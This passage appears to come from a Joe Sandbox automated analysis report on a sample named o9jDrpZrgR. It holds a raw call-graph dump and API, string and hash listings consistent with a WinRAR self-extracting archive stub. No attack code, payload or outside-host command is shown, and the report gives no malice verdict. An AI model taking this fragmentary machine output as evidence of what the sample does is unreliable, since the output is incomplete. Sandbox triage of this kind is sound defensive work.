24731->24783 24732 89bc10 24871 89b425 SHGetMalloc 24732->24871 24735 89bc1c 24872 89b425 SHGetMalloc 24735->24872 24738 89bccb 24738->24693 24744 89bce1 UnmapViewOfFile CloseHandle 24738->24744 24739 89c73f 97 API calls 24741 89bddd 24739->24741 24740 89bc28 24873 88f3fa 82 API calls 2 library calls 24740->24873 24808 89da52 24741->24808 24744->24693 24745 89bc3f MapViewOfFile 24745->24748 24746->24738 24749 89bcb7 Sleep 24746->24749 24748->24720 24749->24738 24749->24746 24750 89c73f 97 API calls 24753 89be03 24750->24753 24751 89be2c 24874 8812d3 GetDlgItem EnableWindow 24751->24874 24753->24751 24754 89c73f 97 API calls 24753->24754 24754->24751 24756 881378 24755->24756 24757 88131f 24755->24757 24880 88e2c1 
GetWindowLongW SetWindowLongW 24756->24880 24759 881385 24757->24759 24879 88e2e8 62 API calls 2 library calls 24757->24879 24759->24591 24759->24592 24759->24668 24761 881341 24761->24759 24762 881354 GetDlgItem 24761->24762 24762->24759 24763 881364 24762->24763 24763->24759 24764 88136a SetWindowTextW 24763->24764 24764->24759 24767 88a0bb 24765->24767 24766 88a14c 24768 88a2b2 8 API calls 24766->24768 24769 88a175 24766->24769 24767->24766 24767->24769 24881 88a2b2 24767->24881 24768->24769 24769->24654 24769->24655 24771->24662 24773 889678 24772->24773 24774 8896d5 CreateFileW 24773->24774 24775 8896c9 24773->24775 24774->24775 24776 88971f 24775->24776 24777 88bb03 GetCurrentDirectoryW 24775->24777 24776->24718 24778 889704 24777->24778 24778->24776 24779 889708 CreateFileW 24778->24779 24779->24776 24780->24694 24781->24708 24782->24725 24784 89c749 __EH_prolog 24783->24784 24785 89bdcf 24784->24785 24786 89b314 ExpandEnvironmentStringsW 24784->24786 24785->24739 24797 89c780 _wcslen _wcsrchr 24786->24797 24788 89b314 ExpandEnvironmentStringsW 24788->24797 24789 89ca67 SetWindowTextW 24789->24797 24792 8a3e3e 22 API calls 24792->24797 24794 89c855 SetFileAttributesW 24796 89c90f GetFileAttributesW 24794->24796 24807 89c86f _abort _wcslen 24794->24807 24796->24797 24799 89c921 DeleteFileW 24796->24799 24797->24785 24797->24788 24797->24789 24797->24792 24797->24794 24800 89cc31 GetDlgItem SetWindowTextW SendMessageW 24797->24800 24803 89cc71 SendMessageW 24797->24803 24902 891fbb CompareStringW 24797->24902 24903 89a64d GetCurrentDirectoryW 24797->24903 24905 88a5d1 6 API calls 24797->24905 24906 88a55a FindClose 24797->24906 24907 89b48e 76 API calls 2 library calls 24797->24907 24799->24797 24801 89c932 24799->24801 24800->24797 24802 884092 _swprintf 51 API calls 24801->24802 24804 89c952 GetFileAttributesW 24802->24804 24803->24797 24804->24801 24805 89c967 MoveFileW 24804->24805 24805->24797 24806 89c97f MoveFileExW 24805->24806 24806->24797 
24807->24796 24807->24797 24904 88b991 51 API calls 2 library calls 24807->24904 24809 89da5c __EH_prolog 24808->24809 24908 890659 24809->24908 24811 89da8d 24912 885b3d 24811->24912 24813 89daab 24916 887b0d 24813->24916 24817 89dafe 24932 887b9e 24817->24932 24819 89bdee 24819->24750 24821 89d6a8 24820->24821 24822 89a5c6 4 API calls 24821->24822 24823 89d6ad 24822->24823 24824 89d6b5 GetWindow 24823->24824 24825 89bf15 24823->24825 24824->24825 24831 89d6d5 24824->24831 24825->24600 24825->24601 24826 89d6e2 GetClassNameW 25397 891fbb CompareStringW 24826->25397 24828 89d76a GetWindow 24828->24825 24828->24831 24829 89d706 GetWindowLongW 24829->24828 24830 89d716 SendMessageW 24829->24830 24830->24828 24832 89d72c GetObjectW 24830->24832 24831->24825 24831->24826 24831->24828 24831->24829 25398 89a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24832->25398 24834 89d743 25399 89a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24834->25399 25400 89a80c 8 API calls 24834->25400 24837 89d754 SendMessageW DeleteObject 24837->24828 24838->24616 24840 89abcc 24839->24840 24842 89abf1 24839->24842 25401 891fbb CompareStringW 24840->25401 24845 89b093 24842->24845 24843 89abdf 24843->24842 24844 89abe3 FindWindowExW 24843->24844 24844->24842 24846 89b09d __EH_prolog 24845->24846 24847 8813dc 84 API calls 24846->24847 24848 89b0bf 24847->24848 25402 881fdc 24848->25402 24851 89b0d9 24853 881692 86 API calls 24851->24853 24852 89b0eb 24854 8819af 128 API calls 24852->24854 24856 89b0e4 24853->24856 24857 89b10d __InternalCxxFrameHandler ___std_exception_copy 24854->24857 24855 881692 86 API calls 24855->24856 24856->24641 24856->24643 24857->24855 24858->24688 24860 89b568 5 API calls 24859->24860 24861 89d4e0 GetDlgItem 24860->24861 24862 89d502 24861->24862 24863 89d536 SendMessageW SendMessageW 24861->24863 24868 89d50d ShowWindow SendMessageW SendMessageW 24862->24868 24864 89d591 SendMessageW SendMessageW SendMessageW 24863->24864 24865 89d572 24863->24865 24866 
89d5c4 SendMessageW 24864->24866 24867 89d5e7 SendMessageW 24864->24867 24865->24864 24866->24867 24867->24644 24868->24863 24869->24704 24870->24732 24871->24735 24872->24740 24873->24745 24874->24608 24875->24684 24876->24703 24877->24676 24878->24664 24879->24761 24880->24759 24882 88a2bf 24881->24882 24883 88a2e3 24882->24883 24884 88a2d6 CreateDirectoryW 24882->24884 24885 88a231 3 API calls 24883->24885 24884->24883 24886 88a316 24884->24886 24889 88a2e9 24885->24889 24887 88a325 24886->24887 24894 88a4ed 24886->24894 24887->24767 24888 88a329 GetLastError 24888->24887 24889->24888 24890 88bb03 GetCurrentDirectoryW 24889->24890 24892 88a2ff 24890->24892 24892->24888 24893 88a303 CreateDirectoryW 24892->24893 24893->24886 24893->24888 24895 89ec50 24894->24895 24896 88a4fa SetFileAttributesW 24895->24896 24897 88a53d 24896->24897 24898 88a510 24896->24898 24897->24887 24899 88bb03 GetCurrentDirectoryW 24898->24899 24900 88a524 24899->24900 24900->24897 24901 88a528 SetFileAttributesW 24900->24901 24901->24897 24902->24797 24903->24797 24904->24807 24905->24797 24906->24797 24907->24797 24909 890666 _wcslen 24908->24909 24936 8817e9 24909->24936 24911 89067e 24911->24811 24913 890659 _wcslen 24912->24913 24914 8817e9 78 API calls 24913->24914 24915 89067e 24914->24915 24915->24813 24917 887b17 __EH_prolog 24916->24917 24953 88ce40 24917->24953 24919 887b32 24920 89eb38 8 API calls 24919->24920 24921 887b5c 24920->24921 24959 894a76 24921->24959 24924 887c7d 24925 887c87 24924->24925 24928 887cf1 24925->24928 24988 88a56d 24925->24988 24927 887d50 24930 887d92 24927->24930 24994 88138b 74 API calls 24927->24994 24928->24927 24966 888284 24928->24966 24930->24817 24933 887bac 24932->24933 24935 887bb3 24932->24935 24934 892297 86 API calls 24933->24934 24934->24935 24937 8817ff 24936->24937 24948 88185a __InternalCxxFrameHandler 24936->24948 24938 881828 24937->24938 24949 886c36 76 API calls __vswprintf_c_l 24937->24949 24939 881887 24938->24939 24945 881847 
___std_exception_copy 24938->24945 24942 8a3e3e 22 API calls 24939->24942 24941 88181e 24950 886ca7 75 API calls 24941->24950 24944 88188e 24942->24944 24944->24948 24952 886ca7 75 API calls 24944->24952 24945->24948 24951 886ca7 75 API calls 24945->24951 24948->24911 24949->24941 24950->24938 24951->24948 24952->24948 24954 88ce4a __EH_prolog 24953->24954 24955 89eb38 8 API calls 24954->24955 24956 88ce8d 24955->24956 24957 89eb38 8 API calls 24956->24957 24958 88ceb1 24957->24958 24958->24919 24960 894a80 __EH_prolog 24959->24960 24961 89eb38 8 API calls 24960->24961 24962 894a9c 24961->24962 24963 887b8b 24962->24963 24965 890e46 80 API calls 24962->24965 24963->24924 24965->24963 24967 88828e __EH_prolog 24966->24967 24995 8813dc 24967->24995 24969 8882aa 24970 8882bb 24969->24970 25138 889f42 24969->25138 24973 8882f2 24970->24973 25003 881a04 24970->25003 25134 881692 24973->25134 24976 8882ee 24976->24973 24984 88a56d 7 API calls 24976->24984 24987 888389 24976->24987 25142 88c0c5 CompareStringW _wcslen 24976->25142 24979 8883e8 25030 881f6d 24979->25030 24984->24976 24985 8883f3 24985->24973 25034 883b2d 24985->25034 25046 88848e 24985->25046 25022 888430 24987->25022 24989 88a582 24988->24989 24993 88a5b0 24989->24993 25386 88a69b 24989->25386 24991 88a592 24992 88a597 FindClose 24991->24992 24991->24993 24992->24993 24993->24925 24994->24930 24996 8813e1 __EH_prolog 24995->24996 24997 88ce40 8 API calls 24996->24997 24998 881419 24997->24998 24999 89eb38 8 API calls 24998->24999 25002 881474 _abort 24998->25002 25000 881461 24999->25000 25001 88b505 84 API calls 25000->25001 25000->25002 25001->25002 25002->24969 25005 881a0e __EH_prolog 25003->25005 25004 881b9b 25004->24976 25005->25004 25017 881a61 25005->25017 25143 8813ba 25005->25143 25008 881bc7 25146 88138b 74 API calls 25008->25146 25010 883b2d 101 API calls 25013 881c12 25010->25013 25011 881bd4 25011->25004 25011->25010 25012 881c5a 25012->25004 25016 881c8d 25012->25016 25147 88138b 74 API 

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00890863: GetModuleHandleW.KERNEL32(kernel32), ref: 0089087C
                                                                • Part of subcall function 00890863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0089088E
                                                                • Part of subcall function 00890863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008908BF
                                                                • Part of subcall function 0089A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0089A655
                                                                • Part of subcall function 0089AC16: OleInitialize.OLE32(00000000), ref: 0089AC2F
                                                                • Part of subcall function 0089AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0089AC66
                                                                • Part of subcall function 0089AC16: SHGetMalloc.SHELL32(008C8438), ref: 0089AC70
                                                              • GetCommandLineW.KERNEL32 ref: 0089DF5C
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0089DF83
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0089DF94
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0089DFCE
                                                                • Part of subcall function 0089DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0089DBF4
                                                                • Part of subcall function 0089DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0089DC30
                                                              • CloseHandle.KERNEL32(00000000), ref: 0089DFD7
                                                              • GetModuleFileNameW.KERNEL32(00000000,008DEC90,00000800), ref: 0089DFF2
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,008DEC90), ref: 0089DFFE
                                                              • GetLocalTime.KERNEL32(?), ref: 0089E009
                                                              • _swprintf.LIBCMT ref: 0089E048
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0089E05A
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0089E061
                                                              • LoadIconW.USER32(00000000,00000064), ref: 0089E078
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0089E0C9
                                                              • Sleep.KERNEL32(?), ref: 0089E0F7
                                                              • DeleteObject.GDI32 ref: 0089E130
                                                              • DeleteObject.GDI32(?), ref: 0089E140
                                                              • CloseHandle.KERNEL32 ref: 0089E183
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                              • API String ID: 3049964643-2656992072
                                                              • Opcode ID: 50bbf177a0c1d4752de0bd6c96611ecc1118ac315f10e319bbbc3905e89797a7
                                                              • Instruction ID: 44d4c0a6381a4afd5a59caec010e93da58520958788f4b91c3d948e9d9d8c405
                                                              • Opcode Fuzzy Hash: 50bbf177a0c1d4752de0bd6c96611ecc1118ac315f10e319bbbc3905e89797a7
                                                              • Instruction Fuzzy Hash: C5610671504745AFDB20BBB8EC49F6B3BACFB44711F08052AF945D2292EB789904C762
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0089B73D,00000066), ref: 0089A6D5
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A6EC
                                                              • LoadResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A703
                                                              • LockResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A712
                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A72D
                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A73E
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0089A7C6
                                                                • Part of subcall function 0089A626: GdipAlloc.GDIPLUS(00000010), ref: 0089A62C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0089A7A7
                                                              • GlobalFree.KERNEL32(00000000), ref: 0089A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                              • String ID: PNG
                                                              • API String ID: 541704414-364855578
                                                              • Opcode ID: 230d806aff37a9e44c19f88d0bc4297c0908803722979f9715c9168ea1fd1020
                                                              • Instruction ID: 568186c7fccadaf1b7930cd158bd8a01e3fdeb46eda0802ea53ce43866c45507
                                                              • Opcode Fuzzy Hash: 230d806aff37a9e44c19f88d0bc4297c0908803722979f9715c9168ea1fd1020
                                                              • Instruction Fuzzy Hash: A6319C75600702BFDB14AF65EC89D2BBBBDFF85760B080619F845D2621EB31DC408AA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6C4
                                                                • Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6F2
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6FE
                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A728
                                                              • GetLastError.KERNEL32(?,?,?,?,0088A592,000000FF,?,?), ref: 0088A734
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                              • String ID:
                                                              • API String ID: 42610566-0
                                                              • Opcode ID: 72e83a86c9728180077c59f84503b9cc75c0898821a2e5bd685ba0d9c6d7d995
                                                              • Instruction ID: 3cdf8b29f4bf99d26ce535fcac8df4cd889aac129fc2fe301692e8a8366f119c
                                                              • Opcode Fuzzy Hash: 72e83a86c9728180077c59f84503b9cc75c0898821a2e5bd685ba0d9c6d7d995
                                                              • Instruction Fuzzy Hash: 7C418F72900519ABCB29FF68CC88AE9B7B8FF48350F144296E559E3240D7346E91DF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002,00000000), ref: 008A7E0F
                                                              • TerminateProcess.KERNEL32(00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002,00000000), ref: 008A7E16
                                                              • ExitProcess.KERNEL32 ref: 008A7E28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 7a8b8316abc23b23e5d4a313fa8025627c9d56d6bc996b7fca909265a42545b5
                                                              • Instruction ID: 3875ad817cac5afd538b9037a6ac41fd74b1f54dab3aa67457dc953bd43935ac
                                                              • Opcode Fuzzy Hash: 7a8b8316abc23b23e5d4a313fa8025627c9d56d6bc996b7fca909265a42545b5
                                                              • Instruction Fuzzy Hash: DEE04632004948ABDF017F28CD09A4A3F6AFF21741B004554F819DA532CB36EEA2DA80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 0cc29cc1c358aa41246163c2f2197f2497d6525f819e7a2a91032bec6a52add2
                                                              • Instruction ID: bead4d911f554bf546afba8befc9c40e74b9f0f5dd5dd7299dd09d78fb874354
                                                              • Opcode Fuzzy Hash: 0cc29cc1c358aa41246163c2f2197f2497d6525f819e7a2a91032bec6a52add2
                                                              • Instruction Fuzzy Hash: 2282E970904245EEDF25EF64C895BFABBB9FF05300F4841B9E949DB182DB315A88CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0089B7E5
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089B8D1
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B8EF
                                                              • IsDialogMessageW.USER32(?,?), ref: 0089B902
                                                              • TranslateMessage.USER32(?), ref: 0089B910
                                                              • DispatchMessageW.USER32(?), ref: 0089B91A
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0089B93D
                                                              • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0089B960
                                                              • GetDlgItem.USER32(?,00000068), ref: 0089B983
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0089B99E
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,008B35F4), ref: 0089B9B1
                                                                • Part of subcall function 0089D453: _wcslen.LIBCMT ref: 0089D47D
                                                              • SetFocus.USER32(00000000), ref: 0089B9B8
                                                              • _swprintf.LIBCMT ref: 0089BA24
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                                • Part of subcall function 0089D4D4: GetDlgItem.USER32(00000068,008DFCB8), ref: 0089D4E8
                                                                • Part of subcall function 0089D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0089AF07,00000001,?,?,0089B7B9,008B506C,008DFCB8,008DFCB8,00001000,00000000,00000000), ref: 0089D510
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0089D51B
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008B35F4), ref: 0089D529
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D53F
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0089D559
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D59D
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0089D5AB
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D5BA
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D5E1
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008B43F4), ref: 0089D5F0
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0089BA68
                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0089BA90
                                                              • GetTickCount.KERNEL32 ref: 0089BAAE
                                                              • _swprintf.LIBCMT ref: 0089BAC2
                                                              • GetLastError.KERNEL32(?,00000011), ref: 0089BAF4
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0089BB43
                                                              • _swprintf.LIBCMT ref: 0089BB7C
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0089BBD0
                                                              • GetCommandLineW.KERNEL32 ref: 0089BBEA
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0089BC47
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0089BC6F
                                                              • Sleep.KERNEL32(00000064), ref: 0089BCB9
                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0089BCE2
                                                              • CloseHandle.KERNEL32(00000000), ref: 0089BCEB
                                                              • _swprintf.LIBCMT ref: 0089BD1E
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089BD7D
                                                              • SetDlgItemTextW.USER32(?,00000065,008B35F4), ref: 0089BD94
                                                              • GetDlgItem.USER32(?,00000065), ref: 0089BD9D
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0089BDAC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0089BDBB
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089BE68
                                                              • _wcslen.LIBCMT ref: 0089BEBE
                                                              • _swprintf.LIBCMT ref: 0089BEE8
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0089BF32
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0089BF4C
                                                              • GetDlgItem.USER32(?,00000068), ref: 0089BF55
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0089BF6B
                                                              • GetDlgItem.USER32(?,00000066), ref: 0089BF85
                                                              • SetWindowTextW.USER32(00000000,008CA472), ref: 0089BFA7
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0089C007
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089C01A
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0089C0BD
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0089C197
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0089C1D9
                                                                • Part of subcall function 0089C73F: __EH_prolog.LIBCMT ref: 0089C744
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089C1FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                              • API String ID: 3445078344-311033401
                                                              • Opcode ID: ca0ce803f92a9af32d9ead6a166dfae64a8bb02617374e9624908fa6dc0a59ab
                                                              • Instruction ID: e77cf46fdda9ecd0c638c2a61c546f25b723ad3948a16523d04a7e3243977997
                                                              • Opcode Fuzzy Hash: ca0ce803f92a9af32d9ead6a166dfae64a8bb02617374e9624908fa6dc0a59ab
                                                              • Instruction Fuzzy Hash: DD42F170944258BAEF21BBA4AD8AFBE3B7CFB01700F080159F641E61D2DB755E44CB26
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 0089087C
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0089088E
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008908BF
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00890B69
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00890B83
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00890B93
